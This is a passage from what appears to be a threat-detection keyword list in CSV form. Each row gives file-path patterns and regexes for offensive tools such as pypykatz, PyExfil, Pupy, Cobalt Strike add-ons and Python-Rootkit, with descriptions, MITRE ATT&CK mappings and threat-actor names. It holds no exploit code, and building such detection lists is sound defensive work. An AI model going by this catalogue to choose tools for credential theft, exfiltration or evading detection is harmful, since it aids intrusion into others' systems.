T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pyasn1/*",".{0,1000}\/pyasn1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/PyClone.py*",".{0,1000}\/PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/pycobalt-*",".{0,1000}\/pycobalt\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*/pycobalt/*",".{0,1000}\/pycobalt\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*/PyExec.git*",".{0,1000}\/PyExec\.git.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*/PyExfil.git*",".{0,1000}\/PyExfil\.git.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/PyExfil/pyexfil/*",".{0,1000}\/PyExfil\/pyexfil\/.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/pykiller/CVE-2022-23131*",".{0,1000}\/pykiller\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" "*/pyLAPS.git*",".{0,1000}\/pyLAPS\.git.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*/pyLAPS.py*",".{0,1000}\/pyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*/Pyobfadvance*",".{0,1000}\/Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfexecute*",".{0,1000}\/Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/pyobfgood*",".{0,1000}\/pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobflite*",".{0,1000}\/Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfpremium*",".{0,1000}\/Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobftoexe*",".{0,1000}\/Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfuse*",".{0,1000}\/Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfusfile*",".{0,1000}\/Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/pypykatz*",".{0,1000}\/pypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/pypykatz.py*",".{0,1000}\/pypykatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/Pyramid.git*",".{0,1000}\/Pyramid\.git.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/pyramid.py*",".{0,1000}\/pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/pyrdp.git*",".{0,1000}\/pyrdp\.git.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/pyrdp.git*",".{0,1000}\/pyrdp\.git.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/pyrdp:latest*",".{0,1000}\/pyrdp\:latest.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/pyrdp_mitm-*",".{0,1000}\/pyrdp_mitm\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/pysnaffler.git*",".{0,1000}\/pysnaffler\.git.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*/Pysoserial.git*",".{0,1000}\/Pysoserial\.git.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*/pysoxy.git*",".{0,1000}\/pysoxy\.git.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*/pysoxy.py*",".{0,1000}\/pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*/pystinger.zip*",".{0,1000}\/pystinger\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/Python-dynload-os.h*",".{0,1000}\/Python\-dynload\-os\.h.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pythonmemorymodule.py*",".{0,1000}\/pythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/Python-Rootkit.git*",".{0,1000}\/Python\-Rootkit\.git.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*/pywerview*",".{0,1000}\/pywerview.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*/pywhisker.git*",".{0,1000}\/pywhisker\.git.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*/pywsus.git*",".{0,1000}\/pywsus\.git.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*/pywsus.py*",".{0,1000}\/pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/pywsus-master.zip*",".{0,1000}\/pywsus\-master\.zip.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*/qakbot.profile*",".{0,1000}\/qakbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/qconn-exec.nse*",".{0,1000}\/qconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/QHpix/CVE-2021-44521*",".{0,1000}\/QHpix\/CVE\-2021\-44521.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" "*/qscan.nse*",".{0,1000}\/qscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake1-info.nse*",".{0,1000}\/quake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake3-info.nse*",".{0,1000}\/quake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake3-master-getservers.nse*",".{0,1000}\/quake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quantloader.profile*",".{0,1000}\/quantloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/quic-go/quic-go/http3*",".{0,1000}\/quic\-go\/quic\-go\/http3.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/QuickViewAD.ps1*",".{0,1000}\/QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*/quicserver.exe*",".{0,1000}\/quicserver\.exe.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/r00t-3xp10it*",".{0,1000}\/r00t\-3xp10it.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/raceabrt.c*",".{0,1000}\/raceabrt\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/RagingRotator.git*",".{0,1000}\/RagingRotator\.git.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*/RagingRotator.go*",".{0,1000}\/RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential 